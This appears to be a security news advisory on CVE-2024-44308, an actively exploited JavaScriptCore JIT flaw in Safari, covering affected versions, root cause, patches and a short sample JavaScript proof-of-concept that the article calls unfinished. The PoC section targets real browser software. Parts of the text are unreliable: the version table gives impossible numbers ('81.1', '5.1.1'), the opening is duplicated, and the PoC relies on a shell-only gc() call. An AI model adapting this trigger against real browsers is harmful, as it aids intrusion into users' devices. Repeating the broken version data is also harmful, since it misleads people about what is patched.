Apple Safari Remote Code Execution Vulnerability in JavaScriptCore Actively Exploited

A severe remote code execution (RCE) vulnerability, tracked as CVE-2024-44308, has been actively exploited in the wild, compromising Apple Safari across various platforms, including iOS, iPadOS, macOS, and visionOS. The flaw, residing in the JavaScriptCore component of WebKit, allows malicious actors to execute arbitrary code on affected systems by manipulating web content in specific ways. This issue arises from improper handling of the scratch2GPR register within the DFG JIT compiler. Apple has responded by releasing critical security updates to address the vulnerability and protect users from potential exploitation.

Apple Safari Remote Code Execution Vulnerability in JavaScriptCore Actively Exploited

A critical vulnerability identified as CVE-2024-44308 has been actively exploited in the wild, affecting Apple Safari and various Apple platforms, including iOS, iPadOS, macOS, and visionOS. This flaw resides in the JavaScriptCore component of WebKit and allows attackers to execute arbitrary code on vulnerable systems. The vulnerability was first reported by Clément Lecigne and Benoît Sevens from Google’s Threat Analysis Group (TAG), who discovered the issue in late November 2024. Apple has since patched the vulnerability in its latest software updates.

The flaw is particularly dangerous because it can be triggered by processing maliciously crafted web content, which may lead to remote code execution (RCE). The security vulnerability has been observed in real-world exploits, particularly targeting Intel-based Mac systems, although it also affects a wide range of Apple devices.

Affected Software and Versions

The CVE-2024-44308 vulnerability affects the following versions of Apple software

SOFTWARE AFFECTED VERSION(S) PATCHED VERSION(S)
iOS 17.7.1, 18.1 17.7.2, 18.1.1
iPadOS 17.7.1, 81.1 17.7.2, 18.1.1
macOS Sequoia 15.1 5.1.1
visionOS 2.1 2.1.1

Apple has confirmed that this vulnerability has been actively exploited, making it essential for users and organizations to apply the necessary updates as soon as possible.

Technical Analysis of the Vulnerability

The root cause of this vulnerability lies in the JavaScriptCore component’s DFG JIT (Just-in-Time) compiler, specifically an issue with register corruption due to improper allocation timing of the scratch2GPR register. This misallocation can lead to inconsistent register state during the speculative execution process, enabling an attacker to manipulate the system’s memory and execute arbitrary code.

The vulnerability is triggered through the getIntTypedArrayStoreOperand() function, which is part of WebKit's internal workings. If a slow path is introduced in the code flow, an unnecessary register allocation occurs, causing a state inconsistency that can be exploited for remote code execution.

A patch for the flaw was released in the following versions:

  • iOS 17.7.2, iOS 18.1.1
  • macOS Sequoia 15.1.1
  • visionOS 2.1.1

These updates contain improved checks for the JavaScriptCore component, fixing the timing of the scratch2GPR register allocation and ensuring proper memory handling during speculative execution.

Exploitability and Proof of Concept (PoC)

A Proof-of-Concept (PoC) has been developed to demonstrate how this vulnerability could be exploited. The PoC involves creating a JavaScript object that manipulates typed arrays, which can trigger the vulnerable code paths. While the PoC is not yet fully developed, it provides critical insight into how the flaw can be triggered. The exploit may allow attackers to execute arbitrary code by leveraging this vulnerability in the WebKit component, particularly when users visit a malicious website.

Here is a sample of the PoC code:

var ab = new ArrayBuffer(8);
var arr = new Int32Array(ab);

const confuser = {
    valueOf() {
        gc();
        if (this.flag) {
            return {x: 0x41414141};
        }
        return 0x1234;
    },
    flag: false
};

function jitMe(arr) {
    let x = 0;
    for (let i = 0; i < 10000; i++) {
        if (i % 100 === 0) {
            confuser.flag = !confuser.flag;
            x = confuser;
        } else {
            x = i & 0xff;
        }
        arr[(i & 0xffff)] = x;
    }
    return arr;
}

for (let i = 0; i < 100; i++) {
    jitMe(arr);
}
jitMe(arr);

This code manipulates the JavaScriptCore functions to trigger the vulnerable register allocation path. The code isn't finished, but it shows the potential for exploitation.

Security Response and Fixes

Apple has been proactive in addressing the issue with security patches for all affected platforms. The fixes are included in the latest updates:

  • iOS 17.7.2 and 18.1.1
  • iPadOS 17.7.2 and 18.1.1
  • macOS Sequoia 15.1.1
  • visionOS 2.1.1

These updates include fixes for both CVE-2024-44308 and a secondary issue, CVE-2024-44309, related to cross-site scripting (XSS) in WebKit. Apple advises all users to update their devices immediately to mitigate the risk of this vulnerability being exploited.

CVE-2024-44308 in the Context of Other Apple Vulnerabilities

This vulnerability comes on the heels of increased attention to macOS malware, particularly targeting cryptocurrency-related businesses. As attacks on Mac systems become more frequent, the need for timely updates and a robust security posture is paramount.

The CISA (Cybersecurity and Infrastructure Security Agency) has added CVE-2024-44308 to its Known Exploited Vulnerabilities Catalog, urging organizations to apply the patches by December 12, 2024, to avoid potential exploitation.

The CVSS (Common Vulnerability Scoring System) score for this vulnerability is 8.8, indicating a high severity level with significant potential for unauthorized access and system compromise.

Conclusion and Recommendations

Apple’s quick response to the CVE-2024-44308 vulnerability highlights the importance of applying security patches promptly. This vulnerability underscores the growing security risks facing Apple users, particularly on Intel-based Mac systems, and the increasing complexity of the attacks targeting macOS.

Apple users are strongly advised to update their devices to the latest versions to protect themselves from potential exploits, including CVE-2024-44308 and other related vulnerabilities.

Take Action:

  • Update your Apple devices to the latest versions immediately.
  • Monitor your systems for suspicious activities and ensure that all security patches are applied.
  • Follow best practices for maintaining a secure environment, including using security solutions to detect and block threats.